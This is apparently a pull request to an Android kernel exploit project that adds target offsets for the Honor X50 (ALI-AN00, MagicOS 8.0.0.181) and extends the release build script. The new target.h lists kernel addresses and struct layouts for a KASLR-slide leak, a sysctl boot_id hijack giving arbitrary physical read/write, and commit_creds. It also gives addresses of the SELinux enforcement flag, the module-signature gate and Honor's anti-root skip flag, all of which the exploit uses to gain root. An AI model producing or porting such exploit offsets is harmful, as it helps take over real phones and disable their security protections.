### PR TITLE
feat: add Honor X50 ALI-AN00 8.0.0.181 target offsets

### DIFF
--- a/README.md
+++ b/README.md
@@ -85,6 +85,7 @@ Build from source instead:
 # 1. Build the exploit binary
 cd exploit && ./docker-build.sh bin             # exploit_static (8.0.0.128)
 #    8.0.0.160: ./docker-build.sh PROJECT=annap-AGT-AN00_8.0.0.160 bin
+#    ALI-AN00 8.0.0.181: ./docker-build.sh PROJECT=parrot-ALI-AN00_8.0.0.181 bin
 #    (the static binary bakes in the default env config; any knob can still
 #     be overridden by environment variables at launch; first run pulls the NDK, ~1.2GB)
 

--- a/README.zh-CN.md
+++ b/README.zh-CN.md
@@ -65,6 +65,7 @@ sh /sdcard/ghostlock/setup.sh
 # 1. 编译exploit
 cd exploit && ./docker-build.sh bin             # 生成exploit_static(8.0.0.128)
 #    8.0.0.160: ./docker-build.sh PROJECT=annap-AGT-AN00_8.0.0.160 bin
+#    ALI-AN00 8.0.0.181: ./docker-build.sh PROJECT=parrot-ALI-AN00_8.0.0.181 bin
 #    (静态版已烘焙默认配置;环境变量仍可覆盖任何项;
 #     首次运行会下载NDK,约1.2GB)
 

--- a/exploit/src/targets/parrot-ALI-AN00_8.0.0.181/target.h
+++ b/exploit/src/targets/parrot-ALI-AN00_8.0.0.181/target.h
@@ -1,0 +1,115 @@
+﻿#ifndef TARGET_H
+#define TARGET_H
+
+// Honor X50 (ALI-AN00), MagicOS 8.0.0.181, Android 14
+// Kernel 5.10.209-android12-9-g50d6158dbd23, kimage base 0xffffffc008000000
+// Value provenance: [kallsyms] boot.img-extracted kernel's embedded table,
+//   [image] boot.img-extracted kernel image,
+//   [disasm] disassembly of the boot.img-extracted kernel
+
+#define BUILD_VARIANT_LABEL "parrot_ali_an00_8_0_0_181"
+#define BUILD_FINGERPRINT "HONOR/ALI-AN00/HNALI:14/HONORALI-AN00/8.0.0.181CHNC00E175R9P3:user/release-keys"
+
+// ===== Memory layout (VA_BITS=39, 4K pages) =====
+#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
+#define P0_PAGE_OFFSET 0xffffff8000000000ULL
+#ifndef P0_PHYS_OFFSET
+#define P0_PHYS_OFFSET 0x80000000ULL       // Qualcomm taro platform const (Image text_offset=0)
+#endif
+#ifndef P0_KERNEL_PHYS_LOAD
+#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL  // device /proc/iomem Kernel code base; P0_PHYS_LOAD env overrides
+#endif
+#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
+#ifndef KERNELSNITCH_IDENTITY_END
+#define KERNELSNITCH_IDENTITY_END 0xffffff8b40000000ULL
+#endif
+#ifndef DIRECT_MAP_BASE
+#define DIRECT_MAP_BASE 0xffffff8000000000ULL
+#endif
+#ifndef DIRECT_MAP_END
+#define DIRECT_MAP_END 0xffffff8b40000000ULL
+#endif
+
+// ===== Kernel symbols ===== [kallsyms]
+#define INIT_TASK_OFF 0x029fbfc0ULL
+#define INIT_CRED_OFF 0x2a10bd0ULL
+#define ROOT_TASK_GROUP_OFF 0x02f21040ULL
+// AVC enforcement read uses selinux_state+0 bit0 [disasm: avc_denied ldarb [x0]].
+#define SELINUX_ENFORCING_OFF 0x03051980ULL
+// Runtime module-signature gate: byte0:=0 => unsigned modules load.
+#define SIG_ENFORCE_OFF 0x02d9f940ULL
+// Honor antiroot (hw_rscan_module): g_rscan_skip_flag.
+#define RSCAN_SKIP_FLAG_OFF 0x030556a8ULL
+
+#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
+#define INIT_CRED (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
+#define RSCAN_SKIP_FLAG (KIMAGE_TEXT_BASE + RSCAN_SKIP_FLAG_OFF)
+
+// ===== sysctl-route (boot_id ctl_table hijack -> arbitrary phys R/W) =====
+// [kallsyms+image] boot_id ctl entry: procname "boot_id", data@8, handler=proc_do_uuid.
+#define CTL_BOOTID_ENTRY_OFF SLIDE_SYSCTL_BOOTID_OFF
+#define CTL_TABLE_DATA_FIELD_OFF 0x08
+#define CTL_BOOTID_DATA_OFF (CTL_BOOTID_ENTRY_OFF + CTL_TABLE_DATA_FIELD_OFF)
+
+// ===== KASLR slide leak (printk loggers + sysctl boot_id) ===== [kallsyms]
+#define SLIDE_NFULNL_LOGGER_OFF 0x029f1498ULL
+#define SLIDE_LOGGERS_0_1_OFF 0x029f13c0ULL
+// sysctl_bootid is a 16-byte buffer, NOT 8-aligned.
+#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x03069d20ULL  // sysctl_bootid+3 (aligned)
+#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
+#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
+#define SLIDE_SYSCTL_BOOTID_OFF 0x02e29e30ULL
+// = rt_sched_class values: idle=0x0253c600, fair=0x0253c6c0, rt=0x0253c7a0, dl=0x0253c880
+#define SLIDE_RT_SCHED_CLASS_OFF 0x0253c7a0ULL
+
+#define SLIDE_NFULNL_LOGGER_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
+#define SLIDE_LOGGERS_0_1_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
+#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
+#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
+#define SLIDE_ROOT_TASK_GROUP_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
+#define SLIDE_SYSCTL_BOOTID_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)
+#define SLIDE_RT_SCHED_CLASS_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_RT_SCHED_CLASS_OFF)
+
+// ===== struct rt_mutex_waiter =====
+#define WAITER_TASK_OFF 0x30
+#define WAITER_LOCK_OFF 0x38
+#define WAITER_PRIO_OFF 0x40
+#define WAITER_DEADLINE_OFF 0x48
+
+#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
+#define FAKE_WAITER_PI_TREE_PRIO_OFF WAITER_PRIO_OFF
+#define FAKE_WAITER_PI_TREE_DEADLINE_OFF WAITER_DEADLINE_OFF
+#define FAKE_WAITER_TASK_OFF WAITER_TASK_OFF
+#define FAKE_WAITER_LOCK_OFF WAITER_LOCK_OFF
+
+// ===== struct task_struct (5.10 + Honor config) =====
+// Chain walk reaches rt_mutex_setprio(fake_task): if prio/normal misses early return,
+// check_class_changed() calls sched_class->prio_changed.
+#define FAKE_TASK_USAGE_OFF 0x40
+#define FAKE_TASK_PRIO_OFF 0x84
+#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
+#define FAKE_TASK_SCHED_CLASS_OFF 0x98
+#define FAKE_TASK_PI_LOCK_OFF 0x8a4
+#define FAKE_TASK_PI_WAITERS_OFF 0x8b8
+#define FAKE_TASK_PI_TOP_TASK_OFF 0x8c8
+#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x8d0
+
+// ===== mm_struct =====
+#define MM_OWNER_OFF 0x348
+
+// ===== task_struct runtime fields =====
+#define TASK_CRED_OFF 0x7b8
+#define TASK_COMM_OFF 0x7c8
+
+// ===== KSU loader link addresses (runtime = link + slide) =====
+#define LINK_COMMIT_CRED_ADDR 0xffffffc0081725acULL
+#define LINK_BOOTID_CTL_ADDR 0xffffffc00ae29e30ULL
+#define LINK_BOOTID_BUF_ADDR 0xffffffc00b069d1dULL
+
+#endif

--- a/release/make-release.sh
+++ b/release/make-release.sh
@@ -7,12 +7,26 @@ set -eu
 cd "$(dirname "$0")/.."
 
 # Device-verified firmwares; everything else ships as untested.
-VERIFIED=" 8.0.0.128 8.0.0.160 9.0.0.157 9.0.0.200SP1 9.0.0.220SP2 9.0.0.230 "
+VERIFIED=" 8.0.0.128 8.0.0.160 9.0.0.157 9.0.0.200SP1 9.0.0.220SP2 9.0.0.230 8.0.0.181 "
 
 if [ $# -gt 0 ]; then
-  TARGETS="$*"
+  TARGETS=""
+  for X in "$@"; do
+    case "$X" in
+      annap-AGT-AN00_*|parrot-ALI-AN00_*)
+        TARGETS="$TARGETS $X"
+        ;;
+      8.*|9.*)
+        TARGETS="$TARGETS annap-AGT-AN00_$X"
+        ;;
+      *)
+        echo "unknown target spec: $X"
+        exit 1
+        ;;
+    esac
+  done
 else
-  TARGETS=$(ls -d exploit/src/targets/annap-AGT-AN00_*/ | sed 's#.*annap-AGT-AN00_##;s#/$##' | sort)
+  TARGETS=$(ls -d exploit/src/targets/{annap-AGT-AN00_*,parrot-ALI-AN00_*} 2>/dev/null | xargs -n1 basename | sort)
 fi
 
 OUT_ROOT="build/release/ghostlock"
@@ -20,8 +34,12 @@ rm -rf "$OUT_ROOT"
 mkdir -p "$OUT_ROOT/exploits"
 
 : > "$OUT_ROOT/manifest"
-for VER in $TARGETS; do
-  T="annap-AGT-AN00_${VER}"
+for T in $TARGETS; do
+  case "$T" in
+    annap-AGT-AN00_*) VER="${T#annap-AGT-AN00_}" ;;
+    parrot-ALI-AN00_*) VER="${T#parrot-ALI-AN00_}" ;;
+    *) echo "unknown target family: $T"; exit 1 ;;
+  esac
   DIR="exploit/src/targets/$T"
   [ -f "$DIR/target.h" ] || { echo "unknown target $T"; exit 1; }
   ./exploit/docker-build.sh "PROJECT=$T" >/dev/null


### PR DESCRIPTION
## Summary

- Add a new target header for Honor X50 (ALI-AN00, MagicOS 8.0.0.181 CHNC00E175R9P3).
- Include verified runtime constants for exploit chain compatibility: KASLR leak, sysctl boot_id hijack route, and KSU loader link addresses.
- Keep scope minimal in exploit logic; only adds new target offsets and source-build docs.
- Extend release packaging (`release/make-release.sh`) to include parrot targets and add `8.0.0.181` to VERIFIED list for release bundle generation.

## Validation scope
- Constants come from boot.img-extracted `vmlinux` + disassembly for symbol + structure confirmation.
- Release changes are build-path updates only and do not alter exploit behavior at runtime.

## Note
- Runtime validation on real devices is required before enabling this as default release manifest entry by maintainers.